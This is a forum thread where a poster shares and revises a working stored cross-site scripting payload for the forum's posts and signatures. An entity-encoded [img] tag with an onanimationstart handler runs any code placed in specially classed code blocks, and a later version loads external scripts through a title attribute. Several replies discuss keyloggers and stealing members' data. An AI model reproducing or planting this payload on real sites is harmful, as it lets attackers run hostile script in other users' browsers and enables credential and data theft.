Better JavaScript injection/Cross Site Scripting (XSS)

This should be a more stable way to insert Javascript code. It creates a dummy iframe (which is only ever created once with this code active) that then copies code tags with the "xss" class as script tags when the iframe is loaded.

Just insert this into your post or signature:

Code:

[img]&#34;onanimationstart=&#34;javascript:var d=document;if(d.getElementsByClassName(&#39;xd&#39;).length==0){var f=d.createElement(&#39;iframe&#39;);f.className=&#39;xd&#39;;f.onload=function(){for(let s of d.getElementsByClassName(&#39;xss&#39;)){if(s.nodeName==&#39;CODE&#39;){var c=d.createElement(&#39;script&#39;);c.type=&#39;text&#47;javascript&#39;;c.text=s.innerText;d.body.appendChild(c);}}};d.body.appendChild(f);}&#34; style=&#34;animation:xa;height:0;&#34;[/img]<style>@keyframes xa{} iframe.xd{height:0;} code.xss{height:0;display:none;}</style>

And then you can do shit like

Code:

<code class="xss">
alert("Burp");
</code>

Example:


Also, I believe angle brackets in the code tags should be spaced out, or else it causes issues.




var c = document.createElement("button");
c.innerHTML = "Click me!";
c.onclick = function() { alert("Burp"); };
document.getElementsByClassName("xbtn")[0].appendChild(c);


This is the one that works properly. The other threads had some kind of issue lmfao

Seems to work on the mobile site, too!

Slight update

Code:

<style>@keyframes xa{from {opacity: 0;} to {opacity: 0;}} iframe.xd{height:0;} code.xss{height:0;display:none;}</style>[img]&#34; style=&#34;animation:xa 1s;height:0;&#34; onanimationstart=&#34;javascript:var d=document;if(d.getElementsByClassName(&#39;xd&#39;).length==0){var f=d.createElement(&#39;iframe&#39;);f.className=&#39;xd&#39;;f.onload=function(){for(let s of d.getElementsByClassName(&#39;xss&#39;)){if(s.nodeName==&#39;CODE&#39;){var c=d.createElement(&#39;script&#39;);c.type=&#39;text&#47;javascript&#39;;c.text=s.innerText;d.body.appendChild(c);}}};d.body.appendChild(f);}&#34;[/img]

New update

Code:

<style>@keyframes xa{0% {opacity: 0;} 100% {opacity: 0;}} iframe.xd,code.xss{height:0;} code.xss{display:none;}</style>[img]&#34; style=&#34;animation:xa 1s;height:0;&#34; onanimationstart=&#34;javascript:var d=document;if(d.getElementsByClassName(&#39;xd&#39;).length==0){var f=d.createElement(&#39;iframe&#39;);f.className=&#39;xd&#39;;f.onload=function(){for(let s of d.getElementsByClassName(&#39;xss&#39;)){if(s.nodeName==&#39;CODE&#39;){var c=d.createElement(&#39;script&#39;);c.text=s.innerText;if (s.title!=&#39;&#39;){c.src=s.title;} d.body.appendChild(c);}}};d.body.appendChild(f);}&#34;[/img]

Now you can link an external script by putting the link to it in the title attribute.

Code:

<code class="xss" title="some-script.js"></code>

I'd like to see ya try

Ah thank you for the source code, Boss!


Now, I can protect you and other members data!

I mean, what data could you even steal using this form of XSS? lol, it only works on forums posts, and you can't really access the forum's databases with it (that would require some kind of SQL injection). A keylogger could be made, but again, it's only on forum posts, so really what good would it be?

I can use it to hide any passwords that were leaked, Boss.

...passwords leaked by the account owners themselves, not from hax, lmfao